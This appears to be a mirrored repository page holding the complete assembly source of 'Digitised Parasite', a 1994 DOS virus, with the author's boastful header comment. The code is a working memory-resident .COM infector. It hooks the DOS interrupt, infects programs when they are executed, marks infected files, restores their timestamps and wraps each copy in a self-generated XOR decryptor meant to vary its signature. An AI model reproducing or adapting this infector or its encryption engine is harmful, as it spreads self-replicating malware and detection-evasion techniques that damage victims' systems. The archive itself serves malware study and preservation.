mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
638 lines
8.8 KiB
NASM
638 lines
8.8 KiB
NASM
comment %
|
|
|
|
Digitised Parasite
|
|
Heyup, dudes, I added the "Weiners XOR machine" that I've been working on,
|
|
it sucks and DF keeps telling me that, but hey, it polymorphs right?
|
|
right guys? HEhehehe, pixy, wheres my disassembly you promised me?
|
|
and no more cracks bout the "WXM" i finished it and it works, so fuck me all
|
|
you lazy sods!
|
|
|
|
Well, so it's not really, polymorphic, but it does make from scratch a
|
|
decryptor, okey, okey, so shaddup already ;)
|
|
|
|
Vir_tit: Digitised Parasite
|
|
Variant: 5th "Australian Parasite"
|
|
Author: Australian Parasite [AIH]
|
|
Origin: Australia
|
|
Length: A whopping 971bytes
|
|
Issue: Resident .COM infector on EXEC
|
|
Date: Completion in June 1994
|
|
|
|
%
|
|
|
|
VERS EQU 5
|
|
|
|
MAIN:
|
|
CALL X0
|
|
|
|
X0:
|
|
MOV BP,SP
|
|
MOV DI,0100
|
|
XCHG W[BP],DI
|
|
SUB DI,0103
|
|
MOV BP,0100
|
|
XCHG DI,BP
|
|
|
|
LEA SI,[BP+OLD3]
|
|
MOVSW
|
|
MOVSB
|
|
|
|
MOV AX,02B44
|
|
INT 21H
|
|
CMP AH,VERS
|
|
JNE GO_MEM
|
|
RET
|
|
|
|
GO_MEM:
|
|
MOV CX,PARGS ;AMOUNT OF MEMORY
|
|
MOV DX,CS
|
|
DEC DX
|
|
MOV ES,DX
|
|
MOV DX,W[2] ;SUB IT FROM CURRENT PSP
|
|
SUB DX,CX
|
|
ES: SUB W[3],CX ;SUB IT FROM OVERALL MEM
|
|
MOV W[2],DX
|
|
|
|
XOR DI,DI
|
|
MOV ES,DX
|
|
LEA SI,[BP+0100]
|
|
|
|
PUSH CS
|
|
POP DS
|
|
|
|
MOV AX,03521 - BUFLEN
|
|
|
|
MOV CX,BUFLEN
|
|
|
|
ADD AX,CX
|
|
|
|
REP MOVSB
|
|
PUSH ES
|
|
POP DS
|
|
INT 21H
|
|
MOV W[OFFSET JUMP+3-0100],ES
|
|
MOV W[OFFSET JUMP+1-0100],BX
|
|
MOV DX,INT21H-0100
|
|
MOV AX,02521 - (INT21H-0100)
|
|
ADD AX,DX
|
|
INT 21H
|
|
|
|
PUSH CS,CS
|
|
POP ES,DS
|
|
RET
|
|
|
|
db "The Digitised Parasite : Australian Parasite [AIH]"
|
|
|
|
INT21H:
|
|
PUSHF
|
|
PUSH AX
|
|
|
|
ADD AH,AH
|
|
CMP AH,04B+04B
|
|
|
|
POP AX
|
|
JE DO_IT
|
|
|
|
POPF
|
|
|
|
CMP AX,02B44
|
|
JNE JUMP
|
|
|
|
MOV AH,VERS
|
|
IRET
|
|
|
|
JUMP: JMP 0000:0000
|
|
|
|
DO_IT:
|
|
push ax,bx,cx,dx,si,di,bp,es,ds
|
|
|
|
;open file
|
|
MOV AX,03D02
|
|
INT 21H
|
|
JNC X1
|
|
|
|
JMP DO_RET
|
|
|
|
X1:
|
|
;save handle
|
|
MOV BX,AX
|
|
|
|
PUSH CS,CS
|
|
POP ES,DS
|
|
|
|
;save the first 3 bytes
|
|
MOV AH,03F
|
|
MOV CX,3
|
|
MOV DX,OFFSET OLD3-0100
|
|
INT 21H
|
|
|
|
MOV SI,DX
|
|
ADD DX,"ZM" - OFFSET (OLD3-0100)
|
|
CMP W[SI],DX
|
|
JE DO_RETS
|
|
|
|
;move pointer to end of file to get size
|
|
MOV AX,04202
|
|
XOR CX,CX
|
|
XOR DX,DX
|
|
INT 21H
|
|
|
|
SUB AX,3
|
|
MOV W[OFFSET HOST-0100],AX
|
|
|
|
MOV AX,04202
|
|
MOV CX,-1
|
|
MOV DX,0-MLEN
|
|
INT 21H
|
|
|
|
MOV DX,ENDV-0100
|
|
MOV CX,MLEN
|
|
MOV AH,03F
|
|
INT 21H
|
|
|
|
MOV SI,DX
|
|
MOV DI,MARKER-0100
|
|
REP CMPSB
|
|
JE DO_RETS
|
|
|
|
;get date & time
|
|
MOV AX,05700
|
|
INT 21H
|
|
PUSH CX
|
|
PUSH DX
|
|
|
|
PUSH BX
|
|
|
|
MOV AX,W[OFFSET HOST-0100]
|
|
ADD AX,0103
|
|
MOV BX,BUFLEN
|
|
XOR SI,SI
|
|
MOV DI,OFFSET ENDV-0100
|
|
CALL POLY
|
|
|
|
POP BX
|
|
MOV AH,040
|
|
INT 21H
|
|
|
|
MOV AH,040
|
|
MOV CX,MLEN
|
|
MOV DX,OFFSET MARKER-0100
|
|
INT 21H
|
|
|
|
MOV AX,04200
|
|
XOR CX,CX
|
|
XOR DX,DX
|
|
INT 21H
|
|
|
|
MOV CL,3
|
|
MOV DX,OFFSET JUMPS-0100
|
|
MOV AH,040
|
|
INT 21H
|
|
|
|
POP DX
|
|
POP CX
|
|
MOV AX,05701
|
|
INT 21H
|
|
|
|
DO_RETS:
|
|
MOV AH,03E
|
|
INT 21H
|
|
|
|
DO_RET:
|
|
POP DS,ES,BP,DI,SI,DX,CX,BX,AX
|
|
POPF
|
|
JMP JUMP
|
|
|
|
;==============================================================================
|
|
;call Poly with
|
|
; AX = Delta offset
|
|
; BX = Length of code to encrypt
|
|
;DS:SI = Offset of code to encrypt
|
|
;ES:DI = Buffer offset of where to put cryption routine
|
|
;returns
|
|
;cx = total length to write
|
|
;ds:dx = 32bit offset of where code is
|
|
|
|
db "Weiners XOR machine 1.0 (C) Australian Parasite [AIH] June 1994"
|
|
|
|
;With some thanks to Vibrant Pixel and Digital Vampyr
|
|
|
|
Poly:
|
|
enter 22,0 ;80286 inst only ;)
|
|
|
|
mov w[bp-20],CX
|
|
mov w[bp-22],si
|
|
mov w[bp-16],di
|
|
mov w[bp-4],ax ;Save Encryption Offset
|
|
mov w[bp-6],bx ;Save Length to encrypt
|
|
add ax,bx
|
|
add w[bp-10],ax ;Add some to the random seed
|
|
|
|
call poly_flood_buffer
|
|
call poly_make_register
|
|
call poly_regnum ;Set regnum seed
|
|
call poly_pointer_set ;Set the encryption delta offset
|
|
call poly_count_set
|
|
call poly_get_byte
|
|
call poly_crypt_byte
|
|
call poly_set_byte
|
|
call poly_inc_data
|
|
call poly_dec_counter
|
|
call poly_calc_loop
|
|
|
|
mov ax,w[bp-16]
|
|
sub di,ax
|
|
mov w[bp-18],di
|
|
|
|
call poly_fix_delta
|
|
|
|
;copy code to end of cryption routine
|
|
|
|
mov cx,w[bp-6]
|
|
mov si,w[bp-22]
|
|
mov di,w[bp-16]
|
|
add di,w[bp-18]
|
|
rep movsb
|
|
|
|
mov cx,w[bp-6]
|
|
mov si,w[bp-16]
|
|
add si,w[bp-18]
|
|
|
|
mov dx,w[bp-8]
|
|
|
|
l1:
|
|
xor b[si],dl
|
|
inc si
|
|
loop l1
|
|
|
|
push es
|
|
pop ds
|
|
|
|
mov dx,w[bp-16]
|
|
mov cx,w[bp-18]
|
|
add cx,w[bp-6]
|
|
|
|
leave ;Whoooo, another 80286+ only;
|
|
;kill our scratch buffer
|
|
ret
|
|
|
|
poly_fix_delta:
|
|
mov di,w[bp-14]
|
|
mov ax,w[bp-18]
|
|
inc di
|
|
add w[di],ax
|
|
ret
|
|
|
|
poly_regnum:
|
|
test dl,0100xb
|
|
je ret
|
|
mov w[bp-8],di ;Yes, then do this
|
|
mov ax,0b0
|
|
stosw
|
|
ret
|
|
|
|
|
|
poly_make_register:
|
|
call poly_rand_byte
|
|
and al,0111xb
|
|
mov dh,al
|
|
;dh = main data get\put register. one of 8 registers
|
|
|
|
l1:
|
|
call poly_rand_byte
|
|
and al,0111xb
|
|
mov dl,al
|
|
cmp dh,dl
|
|
je l1
|
|
;dl = encryption register. one of 7 registers
|
|
|
|
l1:
|
|
; DH AL
|
|
; 0000 AL 0000 AX a# = 0000 or 0100 so it == 00
|
|
; 0001 CL 0001 BX
|
|
; 0010 DL 0010 CX ;notice in AX + CX that bottom bit is off
|
|
; 0011 BL 0011 DX ;and in AL+CL the second bit is off
|
|
; 0100 AH
|
|
; 0101 CH
|
|
; 0110 DH
|
|
; 0111 BH
|
|
|
|
;convert byte reg to word reg
|
|
call poly_rand_byte
|
|
and al,0011xb ;DOES BOTTOM 2 BITS
|
|
|
|
mov ah,dh
|
|
and ah,0011xb
|
|
cmp ah,al
|
|
je l1
|
|
|
|
mov ah,dl
|
|
and ah,0011xb
|
|
cmp ah,al
|
|
je l1
|
|
|
|
shl dl,4
|
|
or dl,al
|
|
|
|
;shl 1 and compare the two top bits
|
|
;00 = AX = AL,AH
|
|
;01 = CX = CL,CL
|
|
;10 = DX = DL,DL
|
|
;11 = BX = BL,BL
|
|
|
|
call poly_rand_byte
|
|
and al,0001xb
|
|
shl al,2
|
|
or dl,al
|
|
|
|
call poly_rand_word
|
|
aad
|
|
and al,1
|
|
shl al,3
|
|
or dl,al
|
|
|
|
;dll = counter reg xxxx xx11 = reg
|
|
;dll = reg or num, 1 = reg to reg xxxx x1xx = flag
|
|
; 0 = reg to num
|
|
;dll = data pointer xxxx 1xxx = Pointer reg SI or DI
|
|
; 0 = SI
|
|
; 1 = DI
|
|
;dlh = encryption reg x111 xxxx = reg
|
|
;dhl = getput reg xxxx x111 = reg
|
|
|
|
ret
|
|
|
|
|
|
poly_get_byte:
|
|
mov ah,dh
|
|
and ah,0111xb
|
|
shl ah,3
|
|
add ah,4
|
|
|
|
test dl,01000xb
|
|
je >l1
|
|
add ah,1
|
|
l1:
|
|
mov al,08a
|
|
stosw
|
|
ret
|
|
|
|
poly_set_byte:
|
|
mov ah,dh
|
|
and ah,0111xb
|
|
shl ah,3
|
|
add ah,4
|
|
|
|
test dl,01000xb
|
|
je >l1
|
|
add ah,1
|
|
l1:
|
|
mov al,088
|
|
stosw
|
|
ret
|
|
|
|
poly_count_set:
|
|
mov al,dl
|
|
and al,0011xb
|
|
add al,0b8
|
|
stosb
|
|
mov ax,w[bp-6]
|
|
stosw
|
|
mov w[bp-2],di ;Save delta
|
|
ret
|
|
|
|
|
|
poly_crypt_byte:
|
|
;this the bash the databyte with the cryptreg\num
|
|
;so its got to be a XOR #l\h, #l\h
|
|
; or XOR #l\h, ##
|
|
; or xor [#i], #l\h ;* never produced
|
|
; or xor [#i], ## ;* never produced
|
|
|
|
test dl,0100xb
|
|
jne >l1
|
|
|
|
;do reg to num conversions
|
|
;crypt reg with number
|
|
;do the xor #l\h, ##
|
|
|
|
call poly_rand_byte
|
|
mov ah,al
|
|
|
|
mov al,dh
|
|
and al,0111xb
|
|
or al,al
|
|
jne >l2
|
|
|
|
;its a straight al
|
|
mov al,034
|
|
stosw
|
|
ret
|
|
|
|
l2:
|
|
add al,0f0
|
|
mov ah,080
|
|
xchg al,ah
|
|
stosw
|
|
call poly_rand_word
|
|
stosb
|
|
jmp >l2
|
|
|
|
|
|
l1:
|
|
;bit is on, so do reg to reg conversions
|
|
;crypt reg with random register
|
|
mov bh,dh
|
|
and bh,0111xb
|
|
|
|
mov al,dl
|
|
shr al,4
|
|
shl al,3
|
|
add bh,al
|
|
add bh,0c0
|
|
|
|
xchg ax,bx
|
|
|
|
mov al,030
|
|
stosw
|
|
|
|
;now fix the reg2reg rndnumber
|
|
mov bx,di
|
|
mov di,w[bp-8]
|
|
mov ah,dl
|
|
shr ah,4
|
|
add ah,0b0
|
|
call poly_rand_byte
|
|
xchg al,ah
|
|
stosw
|
|
mov di,bx
|
|
xchg al,ah
|
|
|
|
l2:
|
|
;al = the cypher byte
|
|
mov w[bp-8],ax
|
|
ret
|
|
|
|
|
|
poly_pointer_set:
|
|
mov w[bp-14],di
|
|
|
|
mov al,0be
|
|
test dl,001000xb
|
|
je >l1
|
|
|
|
inc al
|
|
|
|
l1:
|
|
stosb
|
|
mov ax,w[bp-4]
|
|
stosw
|
|
ret
|
|
|
|
poly_inc_data:
|
|
;data reg pointer is stored in
|
|
;dh = xx1x 0 = si, 1 = di
|
|
|
|
xor ax,ax
|
|
test dl,001000xb
|
|
je >l1
|
|
|
|
inc ah
|
|
|
|
l1:
|
|
call poly_rand_byte
|
|
|
|
test al,00010xb
|
|
je >l1
|
|
|
|
add ah,046
|
|
xchg al,ah
|
|
stosb
|
|
jmp >l2
|
|
|
|
l1:
|
|
mov al,083
|
|
add ah,0c6
|
|
stosw
|
|
mov al,1
|
|
stosb
|
|
|
|
l2:
|
|
ret
|
|
|
|
poly_dec_counter:
|
|
;counter is stored in dll
|
|
;counter is ALWAYS a WORD register
|
|
mov ah,dl
|
|
and ah,0011xb
|
|
|
|
call poly_rand_byte
|
|
|
|
test al,1
|
|
jne >l1
|
|
|
|
;do DEC ##
|
|
xchg al,ah
|
|
add al,048
|
|
jmp >l3
|
|
|
|
l1:
|
|
;do SUB ##,1
|
|
or ah,ah
|
|
je >l1
|
|
|
|
mov al,083
|
|
add ah,0e8
|
|
stosw
|
|
mov al,1
|
|
jmp >l3
|
|
|
|
l1:
|
|
mov ax,012d
|
|
stosw
|
|
mov al,0
|
|
|
|
l3:
|
|
stosb
|
|
|
|
l2:
|
|
ret
|
|
|
|
poly_calc_loop:
|
|
;work it on a j statement
|
|
|
|
;loop while not 0 =
|
|
; JNZ = 075
|
|
; JG = 07F
|
|
; JA = 077
|
|
|
|
mov bx,di
|
|
sub bx,w[bp-2]
|
|
|
|
call poly_rand_byte
|
|
and al,0011xb ;We onlt need 3 inst.....
|
|
|
|
xchg bl,bh
|
|
mov bl,075
|
|
dec al
|
|
js >l1
|
|
|
|
mov bl,077
|
|
dec al
|
|
je >l1
|
|
mov bl,07f
|
|
|
|
l1:
|
|
xchg ax,bx
|
|
not ah
|
|
dec ah
|
|
stosw
|
|
ret
|
|
|
|
poly_flood_buffer:
|
|
push si,ds,di
|
|
mov cx,w[bp-6]
|
|
|
|
xor si,si
|
|
mov ax,0162
|
|
mov ds,ax
|
|
rep movsb
|
|
|
|
pop di,ds,si
|
|
ret
|
|
|
|
poly_rand_byte:
|
|
mov w[bp-12],ax
|
|
call poly_rand_word
|
|
mov ah,b[bp-11]
|
|
ret
|
|
|
|
poly_rand_word:
|
|
push bx,cx,dx
|
|
|
|
in ax,040
|
|
add ax,w[bp-10]
|
|
mov bx,037
|
|
mul bx
|
|
mov bx,0127
|
|
div bx
|
|
add ax,dx
|
|
add w[bp-10],ax
|
|
|
|
pop dx,cx,bx
|
|
ret
|
|
|
|
JUMPS: DB 0E9
|
|
HOST: DW 0000
|
|
|
|
OLD3: DB 0C3,0C3,0C3
|
|
|
|
MARKER: DB "Australian Parasite"
|
|
MLEN EQU $ - MARKER
|
|
|
|
ENDV:
|
|
BUFLEN EQU ENDV-0100
|
|
|
|
PARGS EQU ((BUFLEN/16)+2) * 2
|
|
|